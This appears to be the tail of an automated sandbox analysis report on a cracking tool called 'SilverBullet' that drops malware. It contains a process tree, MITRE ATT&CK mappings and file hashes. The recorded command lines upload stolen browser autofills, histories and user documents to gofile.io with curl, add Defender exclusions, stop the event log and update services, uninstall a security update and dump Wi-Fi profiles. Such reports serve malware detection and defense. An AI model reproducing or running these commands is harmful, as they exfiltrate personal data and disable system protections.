C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
7⤵
PID:5428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:5960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
7⤵
PID:6044

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:5992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
7⤵
PID:5276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:5868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/JoinFormat.dib" https://store10.gofile.io/uploadFile"
7⤵
PID:1424

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:2068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReadBackup.vstx" https://store10.gofile.io/uploadFile"
7⤵
PID:3660

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of SetWindowsHookEx
PID:5932

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\validaccs.txt
2⤵
PID:4220

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\license.txt
2⤵
PID:2548

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\instructions.txt
2⤵
PID:5240

C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE
"C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4668

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
3⤵
- Executes dropped EXE
PID:5928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2240

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4792

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\num3.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\num3.EXE
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3156

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num2.EXE
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4392

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jhi_service.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jhi_service.exe
5⤵
- Executes dropped EXE
PID:3020

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
PID:6140

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2024

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
PID:512

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:860

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
PID:5968

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5876

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
PID:5388

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2768

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:5700

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3136

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "HDNFMUHS"
6⤵
- Launches sc.exe
PID:4544

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MicrosoftEdgeUpdater.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MicrosoftEdgeUpdater.exe
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:2060

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:5400

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:1888

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1424

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
7⤵
PID:5228

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
6⤵
- Launches sc.exe
PID:4948

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:5424

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5864

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
6⤵
- Launches sc.exe
PID:4792

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
6⤵
- Launches sc.exe
PID:4556

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
6⤵
- Launches sc.exe
PID:5276

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
6⤵
PID:5604

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5568

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
6⤵
PID:2964

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5188

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
6⤵
PID:4080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5980

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
6⤵
PID:5488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2100

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
6⤵
PID:1976

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
6⤵
- Launches sc.exe
PID:3020

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2612

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "YWZWALUU"
6⤵
- Launches sc.exe
PID:4640

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3512

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num1.EXE
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1592

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
5⤵
- Executes dropped EXE
PID:512

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe
6⤵
- Executes dropped EXE
PID:912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ .scr"
7⤵
PID:4220

C:\Windows\SYSTEM32\netsh.exe
netsh wlan show profiles
7⤵
PID:2596

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
5⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
6⤵
PID:3532

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3860

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4940

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:3384

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:3352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:396

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4760

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4784

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:4932

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2076

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5068

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:4584

C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe
C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3868

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:4668

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:1316

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:4740

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:700

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:4908

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1736

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:364

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3556

C:\ProgramData\bbskkvrqdoji\fdjrmaypnxal.exe
C:\ProgramData\bbskkvrqdoji\fdjrmaypnxal.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6136

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4508

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:4368

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:5444

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:2324

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:5460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5004

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:6032

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:5940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6020

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:5332

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:6000

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6088

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:6012

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1480

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:6016

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4540

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:512

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4204

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:6092

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:6112

C:\Windows\system32\dialer.exe
dialer.exe
2⤵
PID:4012

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4104

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2692

C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe
C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe
1⤵
- Executes dropped EXE
PID:4272

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:8

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5440

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:3756

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5520

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:1228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4900

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:3788

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2444

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2400

C:\ProgramData\bbskkvrqdoji\fdjrmaypnxal.exe
C:\ProgramData\bbskkvrqdoji\fdjrmaypnxal.exe
1⤵
- Executes dropped EXE
PID:656

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:3796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:5124

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:5484

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:4304

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:4728

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:4536

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:820

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:2840

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:5788

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:6076

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:5176

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:3060

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

Filesize
59KB

MD5
7626aade5004330bfb65f1e1f790df0c

SHA1
97dca3e04f19cfe55b010c13f10a81ffe8b8374b

SHA256
cdeaef4fa58a99edcdd3c26ced28e6d512704d3a326a03a61d072d3a287fd60e

SHA512
f7b1b34430546788a7451e723a78186c4738b3906cb2bca2a6ae94b1a70f9f863b2bfa7947cc897dfb88b6a3fe98030aa58101f5f656812ff10837e7585e3f74

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

Filesize
40KB

MD5
5ce7bdeeea547dc5e395554f1de0b179

SHA1
3dba53fa4da7c828a468d17abc09b265b664078a

SHA256
675cd5fdfe3c14504b7af2d1012c921ab0b5af2ab93bf4dfbfe6505cae8b79a9

SHA512
0bf3e39c11cfefbd4de7ec60f2adaacfba14eac0a4bf8e4d2bc80c4cf1e9d173035c068d8488436c4cf9840ae5c7cfccbefddf9d184e60cab78d1043dc3b9c4e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

Filesize
206KB

MD5
f998b8f6765b4c57936ada0bb2eb4a5a

SHA1
13fb29dc0968838653b8414a125c124023c001df

SHA256
374db366966d7b48782f352c78a0b3670ffec33ed046d931415034d6f93dcfef

SHA512
d340ae61467332f99e4606ef022ff71c9495b9d138a40cc7c58b3206be0d080b25f4e877a811a55f4320db9a7f52e39f88f1aa426ba79fc5e78fc73dacf8c716

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

Filesize
24KB

MD5
1fc15b901524b92722f9ff863f892a2b

SHA1
cfd0a92d2c92614684524739630a35750c0103ec

SHA256
da9a1e371b04099955c3a322baee3aeee1962c8b8dabe559703a7c2699968ef4

SHA512
5cdc691e1be0d28c30819c0245b292d914f0a5beaed3f4fc42ac67ba22834808d66a0bfc663d625274631957c9b7760ada4088309b5941786c794edad1329c75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\0f26f0d634bd85f5_0

Filesize
339KB

MD5
044a33c112dd14189123692e21c9e38b

SHA1
e40f55394279489dffdda90117c7f63447405572

SHA256
03cd998559ecec5313c324bc2b78300dd0499f802802c8e2d7bfb4fed048d9d0

SHA512
abbff333b175033dbaa6da1d96b1216e3ff8de1b52f0fd58e373ca398ccf91fa155b903e2fdb78afd278cb4ddc8fb354fbb8c62eff58b4b6c4ddf037ef03848d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f8aae2cc087fdba3_0

Filesize
289B

MD5
b543fd34b5f0613021e9e89747a6e99f

SHA1
fb1b20e46ed2c752dfd5077cd334013b799f206f

SHA256
d54a578505d6366a6125e571d6623017227889608c4d641d271f76e694316571

SHA512
198ecf8edaad12a634a5c22cf03c238ea96b3d0940ffe7bcb7af1e11f086a3bcf11c592f23557154d7d610a767eec40c9c2d7efff71720a6fe3a1f96c4f3ed38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b83dc2301a1dc41472a4485b895c315d

SHA1
9232c5aadc7cca4f80a1871146b7bae280eef249

SHA256
b698b025fff5790649708bffec03587878f83e332f30889d29bb1555ac28d497

SHA512
c442b13b087185245c0de80bb9019501b8a5c24a495631e1092cade8cacb32509f3e57a141da6ea4cce3af68aee7148ff4d914af80e129b4962bc84c5351ffad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
408B

MD5
29891c60a6726ea226cb38eb3312fde7

SHA1
b97540c70c0be2cc261fc1414641c2840abb8c9e

SHA256
a339b5081400c9671c597a2dd43c6a45d8f34195d956463ff5c81c313b46d275

SHA512
1e99163a07983c0b51496eaede4c3abae8b38888060fc7f5d08090cdc251cc2515eb6d4743ffd9794a47869c6696d0beeec539347c3e1aacad8c619d4e6f61d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
0bd9984ef8054510e3b9867661e03449

SHA1
1d3990f0a8bd24e3c0541e420ced7bee27338ba1

SHA256
bea6c5c20d9a6c102f15c5a102beea26328db983ca29cf7fb594095f2b898f82

SHA512
cacfe48edb00c9bdc22cf58ac609d8e86049969fb4993eb5887119dbd0bdd2a947ac390e811ed0de722b81356e4b7745213ab3cb73d64c4e2aedf1d7843dbcce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
3e9105ceda04ebb6686dff2a2a2d111b

SHA1
a1f0a1f2dca689c69d545b9515851c0126dc91a8

SHA256
63b95953147d188bd3bd1878b4816562c87f5a84f46e8d287520bf893c2c7518

SHA512
1bdab3dc1a1ecb4efc9ca9fcdcf911a7cd49a7e2910e50a453ae5222e05aa352bf5e41a155b561d3c592bafa0b8d9cb7fbf023fd5489aa3c7d5b1bda0e00098c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
7aca294d9b0efa1f6d0cb0bd7faa435c

SHA1
cf2069fedbd9c6eb449accee863672a809b5bb6d

SHA256
c4053490269138da22492d665b571ae2059ec9323005b88d4f5408ac1386b5a9

SHA512
aa9b5e7cfb68cb49a0d5df88c75efbde36cc9090f2fe3e426ea9f6265de54186dba42e6a08eaf44282c41e69105f6eac839ae1d59665b6017ab5b77fe6dc07a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
d75fed11f000b88fc774c41c90db08d6

SHA1
bba23a852cf661941e09ac790672318ea5867e0b

SHA256
61365b6bc0f86c2af9ae42df6a69b942c4823d9e50a8b7a4af81c7fa20facf09

SHA512
01a3ebf2fc2c59ff9e20b88c5959825ddcb7911097cdf317eda070dfe63daa353f3f092cc503c95fe5a1145d7660a4b3f1414eaea41a4144acae42fef233913f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
3b3fa3d5c85bb636317f1e42d2e9c4f3

SHA1
ce8474ed07416d8ad3227b40109c192cdd7a92fe

SHA256
003da8a32d7ed1c7a241feb493d9c30c0b34ad019de672a3c77f7391ff1f488c

SHA512
444323bf2c7c96b4c75a253478a300e6ab0a5634e59e52a6bc7358e8915e7a79c1e43232bc82b2bce77ecda91d02e6bb86de0f39823639fdfb58b90f5747e157

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
8898ae30d54e91234a1a43aba1a56815

SHA1
75741f042e35fe43ebd22771a1172ce123df53c8

SHA256
c0ab55c16163863132dd9a7bb8bf0461de920f0fb92a88f6c0f7ef656b3fe210

SHA512
f2474e5f9c4b1c08b06bec15843ac7062ec835176207b62b9bd948e5f01e818fab854f6fe97f5a1dcb0859a3942b3c205e0093f061121c76d2a56393dc4a5cb6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
9719fee7646bff76ce6bf960c54fb3d6

SHA1
ece96482584fa081035331797a285d8a1c63826f

SHA256
947aa075ffec0ff3c0ce1d849b5f2f39b86e11bce26dbf9ac663cb896daec089

SHA512
9e105e0cc7b3a0d3388bda70dfff911a3f72aca9b99ec4cbf8da781bce777985c3dc30ea18176b43a8ac194c00eb0c918dc817ffb61efc77d8adefe5bc0480a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
27463d001bdb0d9a54f61fed80c14478

SHA1
d229fb379d8c2a0a38a045426177b1584fb06914

SHA256
467592090bbeee573503752386d0f42772c3576160ffcacc5fd80f81267f7dff

SHA512
6fcf4e7a08d397722fa48f293d3d9707aff4b9c687261797f5d0967c5410ff6be060ea414ebddda9d9f09057b83d4cb9e7fa89ab5a313a6f12e1f0248a0247d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f86dbe5003b9386d0d8fdf37ba1c5e2a

SHA1
53e617477f0638860fa5d0725f31e8f6aea5b719

SHA256
181cefc8950982341b1d2334218c9a4786ca40f947cc5200c9d0d516ac33fa07

SHA512
b5e5a5da6a013c1d1755adc0a504e5514908ef7a9ab800b97b177f42ef6e27d7eaa8d13af70f4cbbfd810be4dc76b48d7aad73f84b30d896cd3ed2e5558c1e64

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
873B

MD5
5604477df76fba15a0ad8344e71634ee

SHA1
8ac70ca1195e4254280dbffd4e61d02fb156c0fd

SHA256
d83a0fa76769a7a1d128d2a25c6d57f7073888ef3c081b79da0a188cf0bd1065

SHA512
